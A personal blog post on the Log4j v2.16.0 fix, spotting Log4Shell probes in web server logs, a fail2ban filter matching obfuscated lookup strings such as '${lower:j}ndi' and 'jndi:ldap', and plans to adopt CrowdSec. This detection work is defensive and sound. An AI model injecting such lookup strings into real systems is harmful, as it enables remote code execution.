More Log4j Work
Hot on the heels of the v2.15.0 fix came a v2.16.0 fix, which removed the core of the vulnerability, taking away a feature that was probably not used correctly, if ever used.
I zipped through my JDK apps and performed another Continuous Modernization sweep, and should be just fine for this. I also came up with a list of things to completely modernize, including dropping some apps that require application servers and Servlet containers, or at least refactoring them using stand-alone technologies so they can be properly containerized.
All of that led me to a realization that I've got a gap in my tech stack, and I'm not entirely sure how to fix it just yet.
As I dug through my log aggregation, I saw that this vulnerability is indeed being pressed against my servers. I use Cloudflare as a CDN and IP abstraction, and they're blocking many attempts, but some get through. Maybe there are bits that make it through their WAF, or people are addressing the servers directly. Regardless, hundreds (not huge, but not zero, either) of attempts have been logged by my web servers. Note that none of these are making it to or being emitted by the JVM loggers, so these aren't successful attempts.
I poked a bit and found an example of a fail2ban filter, which I enhanced with a little more aggressive regex, to catch the ${lower:j}ndi
kind of things I saw in my logs. It might be a bit aggressive, and potentially block some false positives, but there isn't anything on my servers where that would be used, except for someone searching for "jndi:ldap" on the pages, for which like two of these blog posts would be a valid item. Within a few minutes of putting the filter in place, it caught and blocked an IP because of a search in a URL. Then I realized that the other server isn't involved in this.
On the "service runs on the OS" server, the logs are still emitted to folders and then read by the analyzers, one of which is fail2ban, which then informs the firewall via ipset. On the "services run in containers" servers, the logs are sent via forwarder to one of the log analyzers, but the others aren't seeing those. It's been a small annoyance as the Awstats is incomplete while Splunk works and collects everything, but fail2ban and others also don't. This means that for this and other things, bad actors can continue to pester my container servers, even when my legacy service server has identified their threat (or annoyance).
I realized that in my container servers, the ingress server should either be or have the intrusion detection inside or before it, or cooperate with the OS, and allow the intrusion detection to cooperate with the OS firewall. I mean, that firewall is dogged simple "drop anything except http(s), and forward those to the ingress private IP." Getting something to block IPs because of bad attempts should be pretty straight forward.
I broke this down into two separate, but tightly-coupled problems. The first is getting that ingress watched, and the second is improving the intrusion detection.
Fail2ban, while a little primitive and brute-force, does work well. It can take some tweaking, but I've watched live as my logs emit records of bad attempts, fail2ban adds a block, and the attempts stop. It isn't distributed, though, so each server has to analyze the logs and determine its own blocks. If there was a way to distribute the blocks, the fail2ban on the container server (which never blocks anything 'cause it sees no logs) could at least leverage the knowledge of the other server.
While investigating this, which seems a problem more have had than solved, I came upon CrowdSec. I poked at it a little and watched some YouTube related to it, and it seems to fit really more than I even need. As its name implies, it's trying to be a crowd-sourced security tool, which allows many systems to contribute findings and share in the details to determine what to block. It seems to have a much more rich toolkit than fail2ban, and looks to be able to monitor the same kinds of log files and events I use to help secure my server.
The CrowdSec model leverages a "bouncer" application, that uses the data from the crowd via a log analyzing "agent" and doesn't allow bad traffic through. This seems like it would well suit my simple blocking needs, configuring this in front of the web app or to interact with the OS firewall. Either solution would work, and this would allow the unprotected server to leverage the other server's (and others' servers') contributions from their log analysis.
This doesn't solve the second problem, of analyzing the log files from the containers. The most straight-forward solution to that seems to be to change from log forwarding from the containers to an analysis tool, to logging on the host, probably to files, and sharing those logs with the various analyzers. Or perhaps having the containers forward their logs to a remote syslog server, into files from which the analyzers could read them.
So I'll be spending a little hobby time seeing if I can get CrowdSec to work with my firewalls, or eventually containers, and if I can better rig my container logs, especially for this kind of intrusion detection. Having them in a "time and size" kind of analyzer like Splunk is great for many things, but having them limited to just the one analyzer breaks some of the other things that logs can help with.
It might be time to break out some ELK, replace that old Awstats, rethink IPS, and more!